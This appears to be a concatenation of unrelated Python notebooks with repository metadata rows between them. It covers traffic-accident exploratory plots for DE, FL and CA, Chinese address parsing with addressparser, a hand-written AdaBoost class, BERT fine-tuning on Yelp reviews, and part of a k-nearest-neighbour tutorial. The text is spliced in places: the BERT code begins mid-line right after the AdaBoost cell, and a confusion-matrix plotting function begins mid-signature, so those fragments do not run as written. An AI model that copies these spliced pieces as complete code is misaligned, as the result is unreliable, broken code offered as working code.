    # Delaware: hourly accident counts for this weekday, reordered by hour.
    df[(df['State']=='DE') & (df['Start_Weekday']==weekday_lst[i])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashed', color='r')
    # Florida, same grouping.
    df[(df['State']=='FL') & (df['Start_Weekday']==weekday_lst[i])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashdot', color='b')
    # California, same grouping.
    df[(df['State']=='CA') & (df['Start_Weekday']==weekday_lst[i])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='solid', color='k')
    # Set labels, legend, title and xticks
    plt.xlabel('Hour')
    plt.legend(['DE', 'FL', 'CA'])
    plt.title(weekday_lst_full[i])
    plt.xticks(np.arange(0, 24, step=2))
    # Only display the y-label on the leftmost plot
    if i == 0:
        plt.ylabel('Number of accidents')
plt.tight_layout()
plt.show()
# +
# Hourly distribution of accidents on Saturday and Sunday for DE, FL, CA.
# Set the size of the figure
fig = plt.figure(figsize=(12, 6))
# Make one subplot per weekend day with a for loop
for i in range(2):
    # Set the subplot
    plt.subplot(1, 2, i + 1)
    # Delaware: hourly accident counts for this weekend day, reordered by hour.
    df[(df['State']=='DE') & (df['Start_Weekday']==weekday_lst[i+5])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashed', color='r')
    # Florida, same grouping.
    df[(df['State']=='FL') & (df['Start_Weekday']==weekday_lst[i+5])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='dashdot', color='b')
    # California, same grouping.
    df[(df['State']=='CA') & (df['Start_Weekday']==weekday_lst[i+5])].groupby('Start_Hour').count()['ID'].reindex(hour_lst).plot(linestyle='solid', color='k')
    # Set labels, legend, title and xticks
    plt.xlabel('Hour')
    plt.legend(['DE', 'FL', 'CA'])
    plt.title(weekday_lst_full[i+5])
    plt.xticks(np.arange(0, 24, step=2))
    # Only display the y-label on the leftmost plot
    if i == 0:
        plt.ylabel('Number of accidents')
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 2: Where do most accidents happen?
#
# ##### A. County
# +
# Share of accidents by county for each state, drawn as pie charts.
feature = 'County'
fig = plt.figure(figsize=(15, 6))
# Slices whose share is at or below this percentage keep an empty label.
pct_cutoff = 2.5

def my_autopct(pct):
    """Format a slice percentage, hiding values at or below the cutoff."""
    if pct > pct_cutoff:
        return '%1.0f%%' % pct
    return ''

for plot_idx, state in enumerate(state_lst, start=1):
    plt.subplot(1, 3, plot_idx)
    # Normalised county frequencies for the current state.
    df_temp = df.loc[df['State'] == state, feature].value_counts(normalize=True).round(8)
    # Blank out labels of slices below the cutoff share.
    labels = ['' if share <= pct_cutoff / 100 else name
              for name, share in zip(df_temp.index, df_temp)]
    plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
    plt.axis('equal')
    plt.xlabel(feature)
    plt.title(state)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 2: Where do most accidents happen?
#
# ##### B. City
# Quick look at city shares.  NOTE(review): filters on 'NJ' while the plots
# in this notebook use DE/FL/CA -- confirm which state set is intended.
df[df['State']=='NJ']['City'].value_counts(normalize=True)
# +
# Share of accidents by city for each state, drawn as pie charts.
feature = 'City'
# Set the size of the figure
fig = plt.figure(figsize=(15, 6))
# Cutoff percentage for display
pct_cutoff = 2.5

# Only display the percentage if it exceeds the predefined cutoff value.
def my_autopct(pct):
    return ('%1.0f%%' % pct) if pct > pct_cutoff else ''

# Run a for loop for each state
for i, state in enumerate(state_lst):
    plt.subplot(1, 3, 1 + i)
    # Normalised city frequencies for the current state.
    df_temp = df[df['State'] == state][feature].value_counts(normalize=True).round(8)
    # Hide labels of slices below the cutoff share.
    labels = [n if v > pct_cutoff / 100 else ''
              for n, v in zip(df_temp.index, df_temp)]
    plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
    plt.axis('equal')
    # FIX: plt.xlabel(feature) was called twice; once is enough.
    plt.xlabel(feature)
    plt.title(state)
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 2: Where do most accidents happen?
#
# ##### C. Zipcode
# +
# Share of accidents by zip code for each state, drawn as pie charts.
feature = 'Zipcode'
# Set the size of the figure
fig = plt.figure(figsize=(15, 6))
# Cutoff percentage for display
pct_cutoff = 2.5

# Only display the percentage if it exceeds the predefined cutoff value.
def my_autopct(pct):
    return ('%1.0f%%' % pct) if pct > pct_cutoff else ''

# Run a for loop for each state
for i, state in enumerate(state_lst):
    plt.subplot(1, 3, 1 + i)
    # Normalised zip-code frequencies for the current state.
    df_temp = df[df['State'] == state][feature].value_counts(normalize=True).round(8)
    # Hide labels of slices below the cutoff share.
    labels = [n if v > pct_cutoff / 100 else ''
              for n, v in zip(df_temp.index, df_temp)]
    plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
    plt.axis('equal')
    # FIX: plt.xlabel(feature) was called twice; once is enough.
    plt.xlabel(feature)
    plt.title(state)
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 2: Where do most accidents happen?
#
# ##### D. Street side
# +
# Share of accidents by street side (Right/Left) for each state.
fig = plt.figure(figsize=(15, 6))
# Run a for loop for each state
for i, state in enumerate(state_lst):
    plt.subplot(1, 3, 1 + i)
    # Top-2 side shares for this state; value_counts sorts by frequency.
    df_side = df[df['State'] == state]['Side'].value_counts(normalize=True).round(2)[:2]
    # BUG FIX: take labels from the data instead of a hard-coded
    # ['Right', 'Left'] list -- value_counts orders by frequency, so the
    # hard-coded labels could be attached to the wrong slices.
    plt.pie(df_side, labels=df_side.index, autopct='%1.0f%%', shadow=True)
    plt.axis('equal')
    plt.xlabel('Street side')
    plt.title('{}'.format(state))
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 2: Where do most accidents happen?
#
# ##### E. Location
# +
# Where do accidents happen? Share of each boolean location flag per state.
feature = 'Accident location'
# Temporarily index by state so the boolean columns can be sliced per state.
df.set_index('State', drop=True, inplace=True)
# State is the index when selecting bool type data as df_bool
df_bool = df.select_dtypes(include=['bool'])
# Restore the original index for other calculations.
df.reset_index(inplace=True)
# Set the size of the figure
fig = plt.figure(figsize=(15, 6))
# Cutoff percentage for display
pct_cutoff = 2.5

# Only display the percentage if it exceeds the predefined cutoff value.
def my_autopct(pct):
    return ('%1.0f%%' % pct) if pct > pct_cutoff else ''

# Run a for loop for each state
for i, state in enumerate(state_lst):
    plt.subplot(1, 3, 1 + i)
    # Boolean location columns for this state, converted to overall shares.
    df_temp = df_bool[df_bool.index == state]
    df_temp = (df_temp.sum(axis=0) / df_temp.sum(axis=0).sum()).sort_values()
    # Hide labels of slices below the cutoff share.
    labels = [n if v > pct_cutoff / 100 else ''
              for n, v in zip(df_temp.index, df_temp)]
    plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
    plt.axis('equal')
    # FIX: plt.xlabel(feature) was called twice; once is enough.
    plt.xlabel(feature)
    plt.title(state)
plt.show()
# +
# Select the data with a list of columns: State, Severity and every boolean
# location column.
# List the locations with data types as boolean
col_sel = list(df.dtypes[df.dtypes=='bool'].index)
# Append state and severity to the list
col_sel.append('State')
col_sel.append('Severity')
# Slice the dataframe with the list above
df_sel = df[col_sel]
# Severity breakdown per location flag per state: for each of the chosen
# locations, what is the severity distribution of the accidents there?
feature = 'Severity'
loc_lst = ['Traffic_Signal','Junction', 'Crossing']
fig_x = len(state_lst)
fig_y = len(loc_lst)
# Set the size of the figure
fig = plt.figure(figsize=(5*fig_x,6*fig_y))
# Cutoff percentage for display
pct_cutoff = 2
# Define autopct: only display the value if the percentage is greater than the cutoff
def my_autopct(pct):
    return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# One row of pies per location type, one column per state.
for i, loc in enumerate(loc_lst):
    # Run a for loop for each state
    for j, state in enumerate(state_lst):
        plt.subplot(fig_y, fig_x, i*fig_x+j+1)
        # Severity shares among accidents at this location in this state.
        df_temp = df_sel
        df_temp = df_temp[(df_temp['State']==state) & (df_temp[loc]==True)]
        df_temp = df_temp[feature].value_counts(normalize=True).round(2)
        # Hide labels of slices below the cutoff share.
        labels = [n if v > pct_cutoff/100 else ''
                  for n, v in zip(df_temp.index, df_temp)]
        plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
        plt.axis('equal')
        plt.xlabel(feature)
        plt.title(state+': '+loc)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 3: With what weather condition do most accidents happen?
#
# ##### A. Top weather conditions with accidents
# Quick look at weather-condition shares for the last `state` left over from
# the loop above.
df[df['State']==state]['Weather_Condition'].value_counts(normalize=True).round(5)
# +
# Share of accidents by weather condition for each state, as pie charts.
feature = 'Weather_Condition'
fig = plt.figure(figsize=(15, 6))
# Slices whose share is at or below this percentage keep an empty label.
pct_cutoff = 2

def my_autopct(pct):
    """Format a slice percentage, hiding values at or below the cutoff."""
    if pct > pct_cutoff:
        return '%1.0f%%' % pct
    return ''

for plot_idx, state in enumerate(state_lst, start=1):
    plt.subplot(1, 3, plot_idx)
    # Normalised weather-condition frequencies for the current state.
    df_temp = df.loc[df['State'] == state, feature].value_counts(normalize=True).round(2)
    # Blank out labels of slices below the cutoff share.
    labels = ['' if share <= pct_cutoff / 100 else name
              for name, share in zip(df_temp.index, df_temp)]
    plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
    plt.axis('equal')
    plt.xlabel(feature)
    plt.title(state)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 3: With what weather condition do most accidents happen?
#
# ##### B. Accident severity for the top 3 weather conditions
# +
# Severity breakdown per weather condition per state: for each of the top
# weather conditions (Clear, Overcast, Mostly Cloudy), what's the severity?
feature = 'Severity'
weather_lst = ['Clear','Overcast','Mostly Cloudy']
fig_x = len(state_lst)
fig_y = len(weather_lst)
# Set the size of the figure
fig = plt.figure(figsize=(5*fig_x,6*fig_y))
# Cutoff percentage for display
pct_cutoff = 2
# Define autopct: only display the value if the percentage is greater than the cutoff
def my_autopct(pct):
    return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# One row of pies per weather condition, one column per state.
for i, weather in enumerate(weather_lst):
    # Run a for loop for each state
    for j, state in enumerate(state_lst):
        plt.subplot(fig_y, fig_x, i*fig_x+j+1)
        # Severity shares among accidents under this weather in this state.
        df_temp = df[(df['State']==state) & (df['Weather_Condition']==weather)][feature].value_counts(normalize=True).round(2)
        # Hide labels of slices below the cutoff share.
        labels = [n if v > pct_cutoff/100 else ''
                  for n, v in zip(df_temp.index, df_temp)]
        plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
        plt.axis('equal')
        plt.xlabel(feature)
        plt.title(state+': '+weather)
plt.tight_layout()
plt.show()
# -
# ### Step 4. Exploratory Data Analysis -- WWW (When, Where, & Weather)
#
# #### Question 3: With what weather condition do most accidents happen?
#
# ##### C. Weather conditions for each accident severity (2, 3, & 4)
# +
# Weather-condition breakdown per severity per state: for each severity
# level (2, 3, 4), what were the weather conditions?
feature = 'Weather_Condition'
severity_lst = [2,3,4]
fig_x = len(state_lst)
fig_y = len(severity_lst)
# Set the size of the figure
fig = plt.figure(figsize=(5*fig_x,6*fig_y))
# Cutoff percentage for display
pct_cutoff = 2
# Define autopct: only display the value if the percentage is greater than the cutoff
def my_autopct(pct):
    return ('%1.0f%%' % pct) if pct > pct_cutoff else ''
# One row of pies per severity level, one column per state.
for i, severity in enumerate(severity_lst):
    # Run a for loop for each state
    for j, state in enumerate(state_lst):
        plt.subplot(fig_y, fig_x, i*fig_x+j+1)
        # Weather shares among accidents of this severity in this state.
        df_temp = df[(df['State']==state) & (df['Severity']==severity)][feature].value_counts(normalize=True).round(2)
        # Hide labels of slices below the cutoff share.
        labels = [n if v > pct_cutoff/100 else ''
                  for n, v in zip(df_temp.index, df_temp)]
        plt.pie(df_temp, labels=labels, autopct=my_autopct, shadow=True)
        plt.axis('equal')
        plt.xlabel(feature)
        plt.title(state+': severity-'+str(severity))
plt.tight_layout()
plt.show()
| 43,247 |
/20210520addressparser中文地址提取/addressparser地址.ipynb
|
a2e9926a5a1cf47853a73ea03758b46fe19ec848
|
[] |
no_license
|
thunderhit/DaDengAndHisPython
|
https://github.com/thunderhit/DaDengAndHisPython
| 35 | 21 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 16,133 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# addressparser: a Python module for extracting the province, city and
# district from simplified-Chinese address strings, with mapping,
# validation and simple plotting support.
# !pip3 install addressparser==0.2.1
# ## Province / city / district extraction
# The default is full-text mode: no word segmentation, direct full-text
# matching -- slower but more accurate.
# +
import addressparser as addr
locations = ["徐汇区虹漕路461号58号楼5楼",
             "泉州市洛江区万安塘西工业区",
             "朝阳区北苑华贸城"]
# Parse the raw address strings into a province/city/district dataframe.
df1 = addr.transform(locations)
df1
# -
# ## Latitude/longitude and province-city-district relation lookups
## Look up the latitude/longitude for a (province, city, district) tuple.
addr.latlng[('北京市','北京市','朝阳区')]
## List every full address containing the district "鼓楼区".
addr.area_map.get_relational_addrs('鼓楼区')
# Note:
# - city_map looks up all addresses containing a given city,
# - province_map looks up all addresses containing a given province.
## List every full address containing both "江苏省" and "鼓楼区".
addr.province_area_map.get_relational_addrs(('江苏省', '鼓楼区'))
# ## Batch address processing
# Read the data.
import pandas as pd
df = pd.read_csv("addr.csv")
df.dropna(inplace=True)  # drop rows with empty addresses
df.head()
len(df)
df['原始地址'].nunique()
# Parse the raw-address column (column name means "original address").
addr_df = addr.transform(df["原始地址"])
addr_df
# Merge df and addr_df column-wise.
processed = pd.concat([df, addr_df], axis=1)
processed.head()
| 1,138 |
/AdaBoost/AdaBoost.ipynb
|
2e8eafe97973f4dcd42134d2261927e3d1bd4d0c
|
[] |
no_license
|
DMak21/ML-Project
|
https://github.com/DMak21/ML-Project
| 0 | 0 | null | 2019-04-25T17:42:52 | 2019-04-25T10:33:33 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 2,733 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd


class AdaBoost(object):
    """AdaBoost ensemble built from least-squares linear classifiers.

    Labels are expected to be +1 / -1.
    """

    def __init__(self, x=None, y=None, T=10):
        self.x = x
        self.n = self.x.shape[0]
        self.y = y
        # Per-sample boosting weights, initialised uniformly.
        self.weights = np.ones(self.n) / self.n
        self.epsilon = []      # weighted error of each weak learner
        self.alpha = []        # voting weight of each weak learner
        self.classifiers = []  # least-squares weight vector of each learner
        self.num_trees = T

    def lsweights(self, x, y):
        """Return the least-squares solution w = (X'X)^+ X'y."""
        xt = np.transpose(x)
        xtx = np.dot(xt, x)
        if xtx.shape[0] != xtx.shape[1]:
            raise ValueError('Needs to be a square matrix for inverse')
        # Pseudo-inverse instead of inv: robust to a singular X'X that can
        # arise when boosting resamples a degenerate subset of rows.
        inv = np.linalg.pinv(xtx)
        xty = np.dot(xt, y)
        return np.dot(inv, xty)

    def predict(self, x, w=None):
        """Predict labels in {-1, 0, +1} with the linear classifier *w*.

        BUG FIX: the original dotted *x* with ``self.weights`` -- the
        per-sample boosting weights, which have the wrong shape.  The
        classifier weight vector is used instead; it defaults to the most
        recently fitted weak learner.
        """
        if w is None:
            w = self.classifiers[-1]
        return np.sign(np.dot(x, w))

    def boost(self, data):
        """Fit ``self.num_trees`` weak learners on (data, self.y).

        BUG FIX: the original called ``lsweights``/``predict`` as free
        functions, appended to non-existent attributes (``self.epsilont``,
        ``self.alphas``), referenced undefined names (``ls``,
        ``self.X_train``), ignored the resampled indices, and overwrote the
        sample weights with the classifier weights.
        """
        for t in range(self.num_trees):
            # Resample the training set according to the current weights.
            idx = np.random.choice(self.n, self.n, p=self.weights)
            w = self.lsweights(data[idx], self.y[idx])
            y_pred = np.sign(np.dot(data, w))
            # Weighted training error of this weak learner.
            e_t = np.sum((y_pred != self.y) * self.weights)
            if e_t > 0.5:
                # Worse than chance: flip the classifier.
                w = -w
                y_pred = -y_pred
                e_t = np.sum((y_pred != self.y) * self.weights)
            self.epsilon.append(e_t)
            # Clamp e_t away from zero so a perfect learner does not divide by 0.
            alpha_t = 0.5 * np.log((1 - e_t) / max(e_t, 1e-10))
            self.alpha.append(alpha_t)
            self.classifiers.append(w)
            # Up-weight misclassified samples and renormalise.
            self.weights *= np.exp(-alpha_t * y_pred * self.y)
            self.weights /= np.sum(self.weights)
# -
).tolist() + test_df['text'].str.len().tolist(),cumulative=True, density=True, bins=40)
plt.xlim(left=90, right=130)
plt.show()
train_df.head()
def count_parameters(model):
    """Return the number of trainable (requires_grad) parameters in *model*."""
    return sum(param.numel() for param in model.parameters() if param.requires_grad)
hidden_size = 200  # width of the intermediate classifier head (also passed as num_labels below)
# +
# Build the tokenizer and a BERT classifier whose stock head is extended
# with a Tanh activation and a Linear projection down to 5 star classes.
tokenizer = BertTokenizer.from_pretrained('bert-base-cased')
# num_labels=hidden_size makes the stock classifier emit `hidden_size`
# features, which the extra modules below map to the 5 classes.
model = BertForSequenceClassification.from_pretrained('bert-base-cased', num_labels=hidden_size)
model.classifier.add_module('bert_activation', nn.Tanh())
model.classifier.add_module('prediction', nn.Linear(hidden_size, 5))
FINE_TUNE = True
print(f'Total model trainable parameters {count_parameters(model)}')
if FINE_TUNE:
    # Freeze the BERT encoder and train only the classification head.
    for param in model.bert.parameters():
        param.requires_grad = False
    for param in model.classifier.parameters():
        param.requires_grad = True
print(f'Total head trainable parameters {count_parameters(model)}')
model.cuda();
model.classifier
tokenized = tokenizer.tokenize(' I am parachuting with you')
print(tokenized)
print(tokenizer.encode(tokenized, add_special_tokens=False))
print(tokenizer.encode(tokenized, add_special_tokens=True))
# https://huggingface.co/transformers/main_classes/processors.html
def get_features(df, text_col, label_col):
    """Convert a dataframe of texts and star labels to a BERT TensorDataset.

    df: dataframe with a string column *text_col* and a numeric *label_col*.
    Returns a TensorDataset of (input_ids, attention_mask, labels), with the
    labels shifted from 1-5 stars to 0-4 class indices.
    """
    examples = [InputExample(guid=idx, text_a=df.loc[idx, text_col], label=df.loc[idx, label_col]) for
                idx, row in tqdm(df.iterrows(), total=df.shape[0])]
    features = glue_convert_examples_to_features(examples=examples,
                                                 tokenizer=tokenizer,
                                                 max_length=300,
                                                 label_list=df[label_col].values,
                                                 output_mode='regression')
    all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
    all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)
    # Shift 1-based star ratings to 0-based class indices for cross-entropy.
    all_labels = torch.tensor([f.label - 1 for f in features], dtype=torch.long)
    # FIX: a token_type_ids tensor was built here but never placed in the
    # dataset; the unused local has been removed.
    dataset = TensorDataset(all_input_ids, all_attention_mask, all_labels)
    return dataset
# Featurise the train/test splits.
train_dataset = get_features(train_df, 'text', 'stars')
test_dataset = get_features(test_df, 'text', 'stars')
# Split off validation indices.  NOTE(review): with train_size=0.1 the FIRST
# returned split (assigned to val_idx) holds 10% of the rows -- confirm this
# 10%-validation / 90%-train split is intended.
val_idx, train_idx = train_test_split(np.arange(len(train_dataset)), random_state=4, train_size=0.1)
total_size = len(train_dataset)
val_dataset = TensorDataset(*train_dataset[val_idx])
train_dataset = TensorDataset(*train_dataset[train_idx])
# Sanity check: the two splits cover the whole dataset.
assert total_size == len(val_dataset) + len(train_dataset)
# works
# Smoke test: one forward pass on two examples.
model(input_ids=train_dataset[:2][0].cuda(),
      attention_mask=train_dataset[:2][1].cuda(),
      labels=train_dataset[:2][2].cuda());
# +
# Training configuration: effective batch of `gradient_every` examples is
# reached by accumulating gradients over several smaller batches.
batch_size = 16
gradient_every = 32
# gradient_every must be a whole multiple of batch_size for accumulation.
assert batch_size <= gradient_every and gradient_every % batch_size == 0
accumulation_steps = gradient_every//batch_size
train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)
# Evaluation loaders can use a larger batch (no gradients are stored).
val_dataloader = DataLoader(val_dataset, batch_size=batch_size*2, shuffle=False)
test_dataloader = DataLoader(test_dataset, batch_size=batch_size*2, shuffle=False)
epochs = 25
lr = 0.002
# Only the classification head is optimised (the encoder is frozen above).
optimizer = AdamW(model.classifier.parameters(), lr=lr)
# Per-epoch mean losses for later plotting.
tr_losses = []
v_losses = []
# scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=0, num_training_steps=len(train_data_loader)*epochs)
for epoch in tnrange(epochs, desc='epoch'):
    """ Training stage """
    epoch_tr_losses = []
    print(f'epoch {epoch+1}')
    for k, (input_ids, attention_mask, labels) in enumerate(tqdm(train_dataloader, total=len(train_dataloader), desc='batch')):
        feed_dict = {'input_ids': input_ids.cuda(),
                     'attention_mask': attention_mask.cuda(),
                     'labels': labels.cuda()}
        # With labels supplied the model returns (loss, logits).
        loss, _ = model(**feed_dict)
        # gradient accumulation: record the unscaled loss, backprop a
        # scaled one, and step the optimizer every `accumulation_steps`.
        epoch_tr_losses.append(loss.item())
        loss = loss/accumulation_steps
        loss.backward()
        if (k + 1) % accumulation_steps == 0:
            optimizer.step()
            model.zero_grad()
    tr_losses.append(np.mean(epoch_tr_losses))
    print(f'train NLL loss: {np.mean(epoch_tr_losses)}')
    """ Validation stage """
    epoch_v_losses = []
    with torch.no_grad():
        for k, (input_ids, attention_mask, labels) in enumerate(tqdm(val_dataloader, total=len(val_dataloader), desc='val batch')):
            feed_dict = {'input_ids': input_ids.cuda(),
                         'attention_mask': attention_mask.cuda(),
                         'labels': labels.cuda()}
            loss, pred = model(**feed_dict)
            epoch_v_losses.append(loss.item())
    v_losses.append(np.mean(epoch_v_losses))
    # NOTE(review): label says 'BCE' but this is the same multi-class loss
    # printed as 'NLL' above -- the message text looks misleading.
    print(f'validation BCE loss: {np.mean(epoch_v_losses)}')
    # Checkpoint only the classification head (the encoder is frozen).
    torch.save(model.classifier.state_dict(), f'/kaggle/working/yelp-head{epoch}.pt')
# Inference on the test set: collect raw logits and true labels per batch.
batch_predictions, batch_actual = [], []
with torch.no_grad():
    for k, (input_ids, attention_mask, labels) in enumerate(tqdm(test_dataloader, total=len(test_dataloader), desc='val batch')):
        feed_dict = {'input_ids': input_ids.cuda(),
                     'attention_mask': attention_mask.cuda()}
        # No labels supplied, so the model's first output is the logits.
        pred = model(**feed_dict)[0].cpu()
        batch_predictions.append(pred.numpy())
        batch_actual.append(labels)
# +
# Flatten the per-batch logits/labels into flat arrays and score micro-F1.
predictions = np.array([row for batch in batch_predictions for row in batch])
predictions = np.argmax(predictions, axis=1)
actual = np.array([label for batch in batch_actual for label in batch])
# -
from sklearn.metrics import f1_score
f1_score(actual, predictions, average='micro')
normalize=False,
title='Confusion matrix',
cmap=plt.cm.Blues):
"""
This function prints and plots the confusion matrix.
Normalization can be applied by setting `normalize=True`.
"""
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
if normalize:
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, cm[i, j],
horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.ylabel('True label')
plt.xlabel('Predicted label')
# compute the confusion matrix
from sklearn.metrics import confusion_matrix
import itertools
confusion_mtx = confusion_matrix(actual, predictions)
# plot the confusion matrix; classes are shown as star ratings 1-5
plot_confusion_matrix(confusion_mtx, classes = range(1,6))
plt.show()
| 8,560 |
/edit02-supervised-learning.ipynb
|
e0f8c7ece61185a9f1bac2fc890a9bcf42a94323
|
[] |
no_license
|
27cansoftuna/SysBioShortCourse
|
https://github.com/27cansoftuna/SysBioShortCourse
| 0 | 0 | null | 2019-01-25T21:11:27 | 2018-05-11T20:23:28 | null |
Jupyter Notebook
| false | false |
.py
| 3,080,135 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="6iDR_nGdDIah" colab_type="text"
# ## Tutorial 2: Supervised Learning
# + [markdown] id="NBU3mbGbDIak" colab_type="text"
# ### In this tutorial, we will focus on classification. We will introduce several common supervised learning methods, and discuss the relationship between model complexity and generalization.
# + [markdown] id="PdNlWv9KDIam" colab_type="text"
# ### Generalization, Overfitting and Underfitting
# + [markdown] id="vXytVys8DIan" colab_type="text"
# 
# + hide_input=false id="p-bR3EPqDIap" colab_type="code" colab={}
# %matplotlib inline
from preamble import *
# + id="VgkQqchNDR3Y" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 102} outputId="43d21151-5984-4181-ea67-2fafce528795"
# !git clone https://github.com/xhxuciedu/SysBioShortCourse
# + [markdown] id="cx9iAKB-DIau" colab_type="text"
# #### Relation of Model Complexity to Dataset Size
# + id="fKPZOg_RDf-H" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 136} outputId="2a05fb1c-cf95-43fc-f5c1-009d658ca33b"
# !ls
# + id="ld8OpXvCDmad" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="fec8a77e-06ca-4e0a-a14f-f29dacbee827"
# %cd SysBioShortCourse/
# + [markdown] id="mulaKJAGDIav" colab_type="text"
# ### Supervised Machine Learning Algorithms
# ##### Some Sample Datasets
# + caption="Forge dataset" label="forge_scatter" id="6yWPcEjiDIaw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 296} outputId="2bbe9501-9c65-4403-8b72-06b840392e27"
# generate dataset
X, y = mglearn.datasets.make_forge()
# plot dataset
mglearn.discrete_scatter(X[:, 0], X[:, 1], y)
plt.legend(["Class 0", "Class 1"], loc=4)
plt.xlabel("First feature")
plt.ylabel("Second feature")
print("X.shape: {}".format(X.shape))
# + id="o5URb3QFDIa4" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="fc036995-b50a-4103-fa62-7fe38c821acc"
from sklearn.datasets import load_breast_cancer
cancer = load_breast_cancer()
print("cancer.keys(): {}".format(cancer.keys()))
# + id="G0k2ROAhDIa-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="a8e2cd68-5c55-4398-abb1-d1064ee39cb5"
print("Shape of cancer data: {}".format(cancer.data.shape))
# + id="RiJ7CPwCDIbD" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="fcf7721b-905b-4166-cc2a-7af04b65d562"
print("Sample counts per class:\n{}".format(
{n: v for n, v in zip(cancer.target_names, np.bincount(cancer.target))}))
# + id="sbb7YPX-DIbI" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 187} outputId="de998fb4-ae80-40b6-f44e-14096a8a7ede"
print("Feature names:\n{}".format(cancer.feature_names))
# + [markdown] id="gHNxfhXYDIbP" colab_type="text"
# ### k-Nearest Neighbor
# #### k-Neighbors Classification
# + hide_input=false id="UVzJLdkYDIbR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 265} outputId="ae5677b4-5d6d-4b4d-ff02-33ccccc17873"
mglearn.plots.plot_knn_classification(n_neighbors=1)
# + hide_input=false id="Ml13cAjZDIbW" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 265} outputId="a59deb52-c4ef-4ffb-b534-a979f6ef13c3"
mglearn.plots.plot_knn_classification(n_neighbors=3)
# + id="XcSxb4xbDIbb" colab_type="code" colab={}
from sklearn.model_selection import train_test_split
# small synthetic 2-feature classification dataset
X, y = mglearn.datasets.make_forge()
# fixed random_state makes the split reproducible
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
# + id="NC5jSikjDIbf" colab_type="code" colab={}
from sklearn.neighbors import KNeighborsClassifier
# classify each point by majority vote of its 3 nearest training neighbors
clf = KNeighborsClassifier(n_neighbors=3)
# + id="iJ1iJqwZDIbj" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="c592d48a-a8f6-4bb1-c91d-f374ec7ad1fb"
clf.fit(X_train, y_train)
# + id="mK6NedzBDIbo" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="f14ccf6a-5e20-4f15-b4b8-86e1e4574992"
print("Test set predictions: {}".format(clf.predict(X_test)))
# + id="TgMhWYG3DIbw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="9ec113c1-c637-4d0d-c198-38f3992c8aa6"
print("Test set accuracy: {:.2f}".format(clf.score(X_test, y_test)))
# + [markdown] id="nHT2TIO3DIb3" colab_type="text"
# ##### Analyzing KNeighborsClassifier
# + hide_input=false id="QuYl5Rr4DIb5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 240} outputId="15e8b697-6a3b-4667-83d7-69b45e0d4ba6"
fig, axes = plt.subplots(1, 3, figsize=(10, 3))
for n_neighbors, ax in zip([1, 3, 9], axes):
# the fit method returns the object self, so we can instantiate
# and fit in one line:
clf = KNeighborsClassifier(n_neighbors=n_neighbors).fit(X, y)
